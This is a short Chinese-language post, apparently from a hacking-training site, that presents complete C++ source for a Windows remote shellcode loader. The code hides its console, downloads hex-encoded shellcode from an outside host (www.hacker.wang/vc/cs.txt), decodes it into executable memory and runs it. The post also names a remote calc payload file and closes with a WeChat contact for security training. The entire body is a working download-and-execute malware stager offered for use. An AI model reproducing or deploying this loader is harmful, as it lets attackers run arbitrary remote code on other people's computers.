0x01: 环境:
windows xp:
vc6.0
0x02:代码:
#include <string>
#include <iostream>
#include <windows.h>
#include <winhttp.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib,"winhttp.lib")
#pragma comment(lib,"user32.lib")
void main()
{
//最小化
HWND my_consle = GetForegroundWindow();
ShowWindow(my_consle, SW_MINIMIZE);
DWORD dwSize = 0;
DWORD dwDownloaded = 0;
LPSTR pszOutBuffer = NULL;
HINTERNET hSession = NULL,
hConnect = NULL,
hRequest = NULL;
BOOL bResults = FALSE;
hSession=WinHttpOpen(L"User Agent",WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,WINHTTP_NO_PROXY_NAME,WINHTTP_NO_PROXY_BYPASS,0);
if(hSession)
{
hConnect=WinHttpConnect(hSession,L"www.hacker.wang",INTERNET_DEFAULT_HTTP_PORT,0);
}
if(hConnect)
{
hRequest=WinHttpOpenRequest(hConnect, L"GET",L"/vc/cs.txt",L"HTTP/1.1", WINHTTP_NO_REFERER,WINHTTP_DEFAULT_ACCEPT_TYPES,0);
}
if(hRequest)
{
bResults=WinHttpSendRequest(hRequest,WINHTTP_NO_ADDITIONAL_HEADERS, 0,WINHTTP_NO_REQUEST_DATA, 0, 0, 0 );
}
if(bResults)
{
bResults=WinHttpReceiveResponse(hRequest,NULL);
}
if(bResults)
{
do
{
// Check for available data.
dwSize = 0;
if (!WinHttpQueryDataAvailable( hRequest, &dwSize))
{
printf( "Error %u in WinHttpQueryDataAvailable.\n",GetLastError());
break;
}
if (!dwSize)
break;
pszOutBuffer = new char[dwSize+1];
if (!pszOutBuffer)
{
printf("Out of memory\n");
break;
}
ZeroMemory(pszOutBuffer, dwSize+1);
if (!WinHttpReadData( hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
{
printf( "Error %u in WinHttpReadData.\n", GetLastError());
}
else
{
printf("%s", pszOutBuffer);
}
//编写shellcode 开始
const char* ShellCode = pszOutBuffer;
int shellcode_length = strlen(ShellCode);
unsigned char* value = (unsigned char*)calloc(shellcode_length/2,sizeof(unsigned char));
for (size_t count=0;count < shellcode_length /2;count++)
{
sscanf(ShellCode,"%2hhx",&value[count]);
ShellCode += 2;
}
void *exec = VirtualAlloc(0,shellcode_length/2,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
memcpy(exec,value,shellcode_length/2);
printf("%s", exec);
((void(*)())exec)();
// 编写shellcode 结束
delete [] pszOutBuffer;
if (!dwDownloaded)
break;
} while (dwSize > 0);
}
if (hRequest) WinHttpCloseHandle(hRequest);
if (hConnect) WinHttpCloseHandle(hConnect);
if (hSession) WinHttpCloseHandle(hSession);
system("pause");
}
0x03: 远程 shellcode 文件内容:
http://www.hacker.wang/vc/calc.txt
0x04:咨询安全培训请加微信:nvhack